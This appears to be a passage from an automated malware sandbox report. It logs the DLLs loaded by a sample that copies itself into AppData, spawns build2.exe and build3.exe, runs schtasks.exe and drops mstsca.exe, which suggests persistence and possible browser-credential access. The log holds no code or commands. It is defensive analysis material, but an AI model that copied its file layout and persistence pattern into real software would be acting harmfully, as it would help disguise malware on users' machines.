Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: rsaenh.dll
